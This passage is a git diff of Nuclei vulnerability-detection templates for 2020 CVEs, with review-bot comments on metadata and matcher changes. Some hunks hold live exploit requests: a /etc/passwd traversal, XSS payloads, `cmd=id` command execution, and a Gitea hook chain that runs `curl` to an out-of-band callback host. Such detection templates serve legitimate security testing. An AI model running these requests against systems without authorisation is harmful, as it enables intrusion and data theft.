a/http/cves/2020/CVE-2020-12478.yaml 
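Review bot: Dropping `req-condition: true` in the CVE-2020-12116 hunk leaves the dsl matcher below referencing `body_2` and `status_code_2` with no explicit multi-request condition; unless the nuclei version this repository runs infers that from the `_2` suffixes, the matcher would be evaluated against a single response and the `BEGIN RSA PRIVATE KEY` check silently stops firing. CVE-2020-12800 in the same commit keeps `req-condition: true` next to its new `matchers-condition: and`, so the two templates now disagree on this; either keep the flag here or record the engine behaviour being relied on. The matcher and extractor blocks continue in the following hunk.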
+++ b/http/cves/2020/CVE-2020-12478.yaml @@ -14,12 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-12478 cwe-id: CWE-306 - cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* - epss-score: 0.00893 + epss-score: 0.00761 + cpe: cpe:2.3:a:teampass:teampass:2.1.27.36:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"teampass" verified: true + vendor: teampass + product: teampass tags: cve,cve2020,teampass,exposure,unauth http: diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 243e131a92..456e90fcb7 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -10,16 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-12720 - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1 - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html + - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-12720 - cwe-id: CWE-89,CWE-306 + cwe-id: CWE-306 + epss-score: 0.83523 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* - epss-score: 0.84671 - tags: cve2020,vbulletin,sqli,packetstorm,cve metadata: max-request: 1 + vendor: vbulletin + product: vbulletin + tags: cve2020,vbulletin,sqli,packetstorm,cve http: - raw: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index 39d347b321..6643002c52 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml 
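Review bot: In the CVE-2020-12720 hunk `cwe-id` is narrowed from `CWE-89,CWE-306` to `CWE-306` while the template is still tagged `sqli` and both packetstorm references in the same hunk describe a vBulletin SQL injection, so the classification now contradicts the rest of the info block. If the intent was to follow an upstream CWE mapping, keeping both identifiers matches how this commit handles multi-CWE entries elsewhere (`cwe-id: CWE-74,CWE-20` in CVE-2020-13942): `cwe-id: CWE-89,CWE-306`.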
@@ -16,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-12800 cwe-id: CWE-434 - cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.97428 - tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive + epss-score: 0.97425 + cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: codedropz + product: drag_and_drop_multiple_file_upload_-_contact_form_7 + tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive http: - raw: @@ -52,12 +55,12 @@ http: CVE-2020-12800-{{randstr}} -----------------------------350278735926454076983690555601-- - - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-13117.yaml b/http/cves/2020/CVE-2020-13117.yaml index 80f3d97523..250edae1a3 100644 --- a/http/cves/2020/CVE-2020-13117.yaml +++ b/http/cves/2020/CVE-2020-13117.yaml @@ -13,11 +13,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13117 cwe-id: CWE-77 - epss-score: 0.06609 + epss-score: 0.0785 + cpe: cpe:2.3:o:wavlink:wn575a4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: http.title:"Wi-Fi APP Login" + vendor: wavlink + product: wn575a4_firmware tags: cve,cve2020,wavlink,rce,oast,router http: diff --git a/http/cves/2020/CVE-2020-13121.yaml b/http/cves/2020/CVE-2020-13121.yaml index 61fc5b4722..261b04a3b9 100644 --- a/http/cves/2020/CVE-2020-13121.yaml +++ b/http/cves/2020/CVE-2020-13121.yaml 
@@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13121 cwe-id: CWE-601 - cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* epss-score: 0.00235 - tags: cve,cve2020,redirect,submitty,oos + cpe: cpe:2.3:a:rcos:submitty:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rcos + product: submitty + tags: cve,cve2020,redirect,submitty,oos http: - raw: diff --git a/http/cves/2020/CVE-2020-13158.yaml b/http/cves/2020/CVE-2020-13158.yaml index d5dd21ec14..c34de78a73 100644 --- a/http/cves/2020/CVE-2020-13158.yaml +++ b/http/cves/2020/CVE-2020-13158.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13158 cwe-id: CWE-22 - cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:*:*:*:* - epss-score: 0.96915 - tags: cve,cve2020,artica,lfi + epss-score: 0.96888 + cpe: cpe:2.3:a:articatech:artica_proxy:*:*:*:*:community:*:*:* metadata: max-request: 1 + vendor: articatech + product: artica_proxy + tags: cve,cve2020,artica,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 8c6a725cd2..e809437a96 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -15,11 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-13167 cwe-id: CWE-78 + epss-score: 0.97384 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* - epss-score: 0.97387 metadata: max-request: 2 hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out + vendor: netsweeper + product: netsweeper tags: cve,cve2020,netsweeper,rce,python,webadmin http: diff --git a/http/cves/2020/CVE-2020-13258.yaml b/http/cves/2020/CVE-2020-13258.yaml index 6298aa0de5..45e88efa3c 100644 --- a/http/cves/2020/CVE-2020-13258.yaml +++ b/http/cves/2020/CVE-2020-13258.yaml 
@@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13258 cwe-id: CWE-79 - cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* epss-score: 0.00464 - tags: cve,cve2020,contentful,xss + cpe: cpe:2.3:a:contentful:python_example:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: contentful + product: python_example + tags: cve,cve2020,contentful,xss http: - raw: diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 6be200889d..ffe2cb9506 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -11,21 +11,24 @@ info: - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192 - http://www.openwall.com/lists/oss-security/2020/06/03/4 - https://nvd.nist.gov/vuln/detail/CVE-2020-13379 + - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html remediation: Upgrade to 6.3.4 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-13379 cwe-id: CWE-918 - epss-score: 0.24779 + epss-score: 0.16322 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Grafana" verified: true + vendor: grafana + product: grafana tags: cve,cve2020,grafana,ssrf http: - - method: GET path: - "{{BaseURL}}/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1" diff --git a/http/cves/2020/CVE-2020-13405.yaml b/http/cves/2020/CVE-2020-13405.yaml index 473bc948e1..32f0657567 100644 --- a/http/cves/2020/CVE-2020-13405.yaml +++ b/http/cves/2020/CVE-2020-13405.yaml @@ -15,12 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13405 cwe-id: CWE-306 + epss-score: 0.00667 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - epss-score: 0.00591 metadata: max-request: 3 shodan-query: http.html:"microweber" verified: true + vendor: microweber + product: microweber tags: cve,cve2020,microweber,unauth,disclosure http: 
@@ -38,7 +40,6 @@ http: - "users/controller" - "modules/users/controller" - "/modules/users/controller" - matchers: - type: dsl dsl: diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index f2b429f804..54ba3e4f7b 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -14,11 +14,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-13483 cwe-id: CWE-79 - cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* epss-score: 0.00113 - tags: cve,cve2020,xss,bitrix + cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: bitrix24 + product: bitrix24 + tags: cve,cve2020,xss,bitrix http: - method: GET @@ -27,9 +29,9 @@ http: - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E' stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-13700.yaml b/http/cves/2020/CVE-2020-13700.yaml index 9e9c3d4531..d02cf5687c 100644 --- a/http/cves/2020/CVE-2020-13700.yaml +++ b/http/cves/2020/CVE-2020-13700.yaml @@ -16,11 +16,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-13700 cwe-id: CWE-639 - cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:*:*:* - epss-score: 0.01462 - tags: cve,cve2020,wordpress,plugin + epss-score: 0.01364 + cpe: cpe:2.3:a:acf_to_rest_api_project:acf_to_rest_api:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: acf_to_rest_api_project + product: acf_to_rest_api + tags: cve,cve2020,wordpress,plugin http: - method: GET 
@@ -29,16 +32,15 @@ http: matchers-condition: and matchers: - - type: word + part: header words: - 'Content-Type: application/json' - part: header - type: word + part: body words: - 'acf-to-rest-api\/class-acf-to-rest-api.php' - part: body condition: and - type: status diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 4a0d702f50..081d0f3d3b 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -11,17 +11,20 @@ info: - https://gtacknowledge.extremenetworks.com/articles/Solution/000051136 - https://gtacknowledge.extremenetworks.com - https://nvd.nist.gov/vuln/detail/CVE-2020-13820 + - https://documentation.extremenetworks.com/release_notes/netsight/XMC_8.5.0_Release_Notes.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-13820 cwe-id: CWE-79 - cpe: cpe:2.3:a:extremenetworks:extreme_management_center:*:*:*:*:*:*:*:* - epss-score: 0.00222 + epss-score: 0.00237 + cpe: cpe:2.3:a:extremenetworks:extreme_management_center:8.4.1.24:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: title:"Extreme Management Center" verified: true + vendor: extremenetworks + product: extreme_management_center tags: cve,cve2020,xss,extremenetworks http: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 5aa85295e9..136990219f 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -17,12 +17,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 + cwe-id: CWE-1188 + epss-score: 0.94321 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - epss-score: 0.95492 metadata: max-request: 1 verified: true shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + vendor: apache + product: airflow tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev http: 
diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index e47df145fa..6eeb92c490 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -14,33 +14,36 @@ info: cvss-score: 5.3 cve-id: CVE-2020-13937 cwe-id: CWE-922 - cpe: cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - epss-score: 0.97436 - tags: cve,cve2020,apache + epss-score: 0.97402 + cpe: cpe:2.3:a:apache:kylin:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: kylin + tags: cve,cve2020,apache http: - method: GET path: - "{{BaseURL}}/kylin/api/admin/config" + headers: - Content-Type: application/json + Content-Type: "application/json" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word + part: header words: - "application/json" - part: header - type: word + part: body words: - config - kylin.metadata.url condition: and - part: body + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-13942.yaml b/http/cves/2020/CVE-2020-13942.yaml index 29bc3cf904..bdb3153322 100644 --- a/http/cves/2020/CVE-2020-13942.yaml +++ b/http/cves/2020/CVE-2020-13942.yaml @@ -20,19 +20,20 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13942 - cwe-id: CWE-74 + cwe-id: CWE-74,CWE-20 + epss-score: 0.97533 cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:* - epss-score: 0.9752 - tags: cve,cve2020,apache,rce metadata: max-request: 1 + vendor: apache + product: unomi + tags: cve,cve2020,apache,rce http: - method: POST path: - "{{BaseURL}}/context.json" - headers: - Content-Type: application/json + body: | { "filters": [ @@ -53,15 +54,11 @@ http: "sessionId": "nuclei" } + headers: + Content-Type: "application/json" + matchers-condition: and matchers: - - type: regex - part: body - regex: - - "(profile|session)(Id|Properties|Segments)" - - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" - condition: and - - type: word part: header words: 
@@ -69,6 +66,13 @@ http: - "context-profile-id" condition: and + - type: regex + part: body + regex: + - "(profile|session)(Id|Properties|Segments)" + - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" + condition: and + - type: status status: - 200 diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 3ab846f850..c9eb69b7e8 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -15,11 +15,13 @@ info: cvss-score: 6.5 cve-id: CVE-2020-13945 cwe-id: CWE-522 - cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* epss-score: 0.00598 - tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: apisix + tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix http: - raw: @@ -39,7 +41,6 @@ http: } } } - - | GET /{{randstr}}?cmd=id HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index 25f380a2d5..f4bdee3db1 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -9,16 +9,21 @@ info: - https://wpscan.com/vulnerability/10287 - https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro - https://nvd.nist.gov/vuln/detail/CVE-2020-14092 + - https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers + - https://wpvulndb.com/vulnerabilities/10287 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14092 cwe-id: CWE-89 - cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:*:*:* - epss-score: 0.8613 - tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress + epss-score: 0.76739 + cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: ithemes + product: paypal_pro + tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress http: - method: GET 
@@ -28,17 +33,18 @@ http: matchers-condition: and matchers: - type: word + part: header words: - "text/html" - part: header + - type: word + part: body words: - '"user_login"' - '"user_email"' - '"user_pass"' - '"user_activation_key"' condition: and - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index a5091c102e..5c73904b6c 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml 
@@ -11,55 +11,52 @@ info: - https://github.com/go-gitea/gitea/pull/13058 - https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/ - https://nvd.nist.gov/vuln/detail/CVE-2020-14144 + - https://docs.github.com/en/enterprise-server@2.19/admin/policies/creating-a-pre-receive-hook-script remediation: Fixed in version 1.16.7. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14144 cwe-id: CWE-78 + epss-score: 0.96792 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* - epss-score: 0.96681 metadata: max-request: 7 shodan-query: html:"Powered by Gitea Version" verified: true - tags: cve,cve2020,rce,gitea,authenticated,git + vendor: gitea + product: gitea + tags: cve,cve2020,rce,gitea,authenticated,git,intrusive http: - raw: - | GET /user/login HTTP/1.1 Host: {{Hostname}} - - | POST /user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}} - - | GET /repo/create HTTP/1.1 Host: {{Hostname}} - - | POST /repo/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master - - | POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}} - - | GET /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} - - | POST /{{username}}/{{randstr}}/_new/master HTTP/1.1 Host: {{Hostname}} 
@@ -68,12 +65,13 @@ http: _csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct cookie-reuse: true + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "http" + - http - type: word part: body_1 @@ -85,19 +83,19 @@ http: name: csrf group: 1 regex: - - 'name="_csrf" value="(.*)"' + - name="_csrf" value="(.*)" internal: true - type: regex name: auth_csrf group: 1 regex: - - 'name="_csrf" content="(.*)"' + - name="_csrf" content="(.*)" internal: true - type: regex name: last_commit group: 1 regex: - - 'name="last_commit" value="(.*)"' + - name="last_commit" value="(.*)" internal: true diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 7e1388c837..defae285c5 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-14179 - epss-score: 0.00972 + epss-score: 0.0047 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: jira_data_center tags: cve,cve2020,atlassian,jira,exposure,disclosure http: diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 9add275247..84082ee55e 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -14,10 +14,13 @@ info: cvss-score: 5.3 cve-id: CVE-2020-14181 cwe-id: CWE-200 - epss-score: 0.97351 + epss-score: 0.971 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: data_center tags: cve,cve2020,atlassian,jira,packetstorm http: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 8e815ce984..0da876ebbf 100644 
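Review bot: The csrf, auth_csrf and last_commit extractors in the CVE-2020-14144 hunk lose their single quotes, leaving patterns such as `name="_csrf" value="(.*)"` as plain scalars; that parses today, but any later edit that introduces `: ` or ` #` into a pattern, or starts it with a quote, silently changes the YAML structure instead of the regex. Elsewhere in this commit regexes stay quoted (`- "(?m)/cachestart/.*/jquery/"` in CVE-2020-12116), so keeping `- 'name="_csrf" value="(.*)"'` and the `- "http"` word in the preceding hunk would be the consistent style. The enclosing `http:` block starts in the earlier hunk of this file.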
--- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14408 cwe-id: CWE-79 - cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* epss-score: 0.00113 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: agentejo + product: cockpit tags: cve,cve2020,cockpit,agentejo,xss,oss http: @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index 71384942bf..fe2b26bf64 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-14413 cwe-id: CWE-79 - cpe: cpe:2.3:a:nedi:nedi:*:*:*:*:*:*:*:* epss-score: 0.00095 - tags: cve,cve2020,nedi,xss + cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nedi + product: nedi + tags: cve,cve2020,nedi,xss http: - method: GET @@ -26,17 +28,16 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index f102633a55..4fe69b2713 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml 
@@ -11,17 +11,20 @@ info: - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750 - https://nvd.nist.gov/vuln/detail/CVE-2020-14750 + - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14750 - cpe: cpe:2.3:a:oracle:fusion_middleware:*:*:*:*:*:*:*:* - epss-score: 0.97539 + epss-score: 0.97528 + cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"Weblogic Application Server" verified: true - tags: cve,cve2020,rce,oracle,weblogic,unauth,kev + vendor: oracle + product: fusion_middleware + tags: packetstorm,cve,cve2020,rce,oracle,weblogic,unauth,kev http: - raw: @@ -53,7 +56,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 238ae70603..935d3ff093 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml 
@@ -13,24 +13,30 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-14864 - cpe: cpe:2.3:a:oracle:business_intelligence:*:*:*:*:*:*:*:* - epss-score: 0.35997 - tags: cve,cve2020,oracle,lfi,kev,packetstorm + cwe-id: CWE-22 + epss-score: 0.30306 + cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 2 + vendor: oracle + product: business_intelligence + tags: cve,cve2020,oracle,lfi,kev,packetstorm http: - method: GET path: - - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies + - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' + cookie-reuse: true + matchers-condition: and matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + - type: status status: - 200 - - type: regex - regex: - - 'root:.*:0:0:' - part: body diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 5bbf261482..984102de19 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -16,11 +16,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-14882 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97553 - tags: cve,cve2020,oracle,rce,weblogic,oast,kev + epss-score: 0.97544 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,rce,weblogic,oast,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 3be72b8794..5b7c8156b8 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml 
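Review bot: The removed inline comment `# grab autologin cookies` was the only explanation visible in the CVE-2020-14864 hunk of why the first `saw.dll?bieehome&startPage=1` request exists, and the newly added `cookie-reuse: true` depends on exactly that, so the two-request flow is now undocumented. Suggest a comment above the path list, e.g. `# the first request collects the autologin cookies that cookie-reuse forwards to the previewFilePath request`, so a later cleanup does not collapse the template to a single request.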
@@ -15,14 +15,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2020-14883 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97532 + epss-score: 0.97528 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Oracle PeopleSoft Sign-in" + vendor: oracle + product: weblogic_server tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 - variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index e95022156b..b43b8e7c11 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-15050 cwe-id: CWE-22 + epss-score: 0.14193 cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* - epss-score: 0.26151 - tags: suprema,biostar2,packetstorm,cve,cve2020,lfi metadata: max-request: 1 + vendor: supremainc + product: biostar_2 + tags: suprema,biostar2,packetstorm,cve,cve2020,lfi http: - method: GET diff --git 